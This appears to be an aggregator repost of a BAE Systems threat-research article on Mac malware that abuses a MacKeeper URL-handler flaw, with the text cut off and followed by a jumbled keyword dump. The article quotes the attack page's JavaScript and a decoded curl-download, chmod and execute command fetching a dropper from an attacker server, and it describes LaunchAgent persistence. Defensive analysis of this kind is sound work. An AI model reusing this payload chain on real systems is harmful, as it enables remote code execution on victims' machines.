One Article Review
| Source |  BAE |
|---|---|
| Identifiant | 352315 |
| Date de publication | 2017-03-06 12:14:28 (vue: 2017-03-06 12:14:28) |
| Titre | New Mac OS Malware Exploits MacKeeper |
| Texte | Written by Sergei Shevchenko, Cyber ResearchLast month a new advisory was published on a vulnerability discovered in MacKeeper, a controversial software created by Ukrainian company ZeoBIT, now owned by Kromtech Alliance Corp.As discovered by Braden Thomas, the flaw in MacKeeper's URL handler implementation allows arbitrary remote code execution when a user visits a specially crafted webpage. The first reports on this vulnerability suggested that no malicious MacKeeper URLs had been spotted in the wild yet. Well, not anymore. Since the proof-of-concept was published, it took just days for the first instances to be seen in the wild. The attack this post discusses can be carried out via a phishing email that contains malicious URL.Once clicked, the users running MacKeeper will be presented with a dialog that suggests they are infected with malware, prompting them for a password to remove this. The actual reason is so that the malware could be executed with the admin rights. The webpage hosted by the attackers in this particular case has the following format: window.location.href= 'com-zeobit-command:///i/ZBAppController/performActionWithHelperTask: arguments:/[BASE_64_ENCODED_STUB]'; where [BASE_64_ENCODED_STUB], once decoded, contains the following commands interpreted and executed by MacKeeper, using system shell: curl -A 'Safari' -o /Users/Shared/dufh http://[removed]/123/test/qapucin/bieber/210410/cormac.mcr;chmod 755 /Users/Shared/dufh;cd /Users/Shared;./dufhThe launcher path for this command is specified within the [BASE_64_ENCODED_STUB] as "/bin/sh" (a symlink to the currently configured system shell), and the prompt message displayed to the user is: "Your computer has malware that needs to be removed"As a result, once the unsuspecting user click the malicious link, the following dialog box will pop up: Once the password is specified, the malware will be downloaded, saved as /Users/Shared/dufh, and executed. At this stage, the executable file dufh is a dropper. When run, it will dump an embedded executable and then launch it. The dropper will create a plist and update the LaunchAgents in order to enable an auto-start for the created executable ("RunAtLoad"). Backdoor functionalityThe embedded executab |
| Envoyé | Oui |
| Condensat | &config=1the &log= &mac= 0 1 6:38pm 6:41pm a add and availability call cmp download encrypted jmp jnb list mov movzx open operating rax rss set the time upload user where window xor /0ohgah/qapfah/yo00aj/kzvxez/8sbuoz /123/test/qapucin/bieber/210410/cormac /bin/sh /dufh username /dufhthe /file /rh/ewar/a1br/pgbr /rkwh0/zkwh0/s0kh0/1tieco8@ /upyta/p4xat/gzmal/khksl/xhksl /users/shared/dufh /users/shared/dufh http:// /users/shared/dufh;cd /users/shared; 0:00 0e150722 0e150722h 0x0e150722 0x0e150722: 0x1b1f 0x7831cfc5 1 1164 1896 1f1b 2433344 2434972 2471604 3 3428 3y=x1xjny1qhvxwjicnjj4=http:// 527 529 562 581cf8ff0148f5e95c19a6f27c19a6ef 69643d30303030266d61633d4d616320 6:38pm 755 9operation :user ; = 0x7831cfc5 > 0x7624c8e7 ^ 0x0e150722 a xor key 0x0e150722 above access accessing actions: actual admin advisory algorithm to all alliance allocate allowing allows along any anymore application/x applied arbitrary are arguments:/ as: as:e7c82476 attack attackers auto backdoor base base64 bashroot been below below: between big binary blob block blue bot box braden buffer byte byte bytes c&c called can carried case check checking checks chunk claimed click clicked code coded collected collects com command command username command:///i/zbappcontroller/performactionwithhelpertask: commands commands communicationsthe company computer computers concept conclusionit config config 1files filelog logold config 2id idtoken h8sn3vq6klextensions configuration configured connected connectionsconfigurationthe consists construct constructed constructs contain contains content controversial corp could cpu crafted crc16 create created curl currently cyber dad4 data data: datanote: days decoded decrypt decryptionthe default delete deleteend delivered demonstrated designated dialog difference dil discovered discovered in discusses displayed distinguishes dl done downloaded downloaded/executed downloads dropper dufh dump edx email emails embedded enable enc encode encoded encrypt encrypted end endian esi example executable execute execute executeblock executed execution exit explained exploit exploits extensions extracted fashion field file file files filesthe first fixed xor flaw following follows form format: from functionalitythe generated generated urls goes google h8sn3vq6kl had handler hard has hash have hello hence hexadecimal high hoping hosted how href= htm htm/ http://www i=jwj+rcu3mcweezp9xmm=the ic=7dqfbkyly2t9rwe8pv8=http:// id= implementation in:e7c82476 increment index infected info information information:id=0000&mac=mac initialise installed instance instances integers integrity interesting internet interpreted is: its its press just keeps key key key: e7c82476 key:7d5a25254b12191f7e6415the know kromtech launch launchagents launcher li=cbbgu0ipodmzz6jrqx0=http:// like: like:http:// link list little location log login look looks loop loop: mac mac macconfig configget mackeeper malicious malware marked mcr;chmod mem message might million month name name name filenamepathtosave pathtosaveshell shellstart needs network new next not now nsmachoperatingsystem number obtain obtained:0x7624c8e7 old once one online only operator order original other out over owned page: parameter parameters parses particular parts parts: passed password path pdf pdf/ perform permissions phishing picked pid pipe plist plus pop post present presented process processes produce prompt prompting proof proxy ptr published quality quite random randomise randomised randomly rax rax raxthe rbp+decoded rbp+encrypted rbp+index rbp+random rbp+rax+random rbp+size rcx rcx+rax rcx+rax+4 reason red release remote remove removed rep |
| Tags | |
| Stories | |
| Notes | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.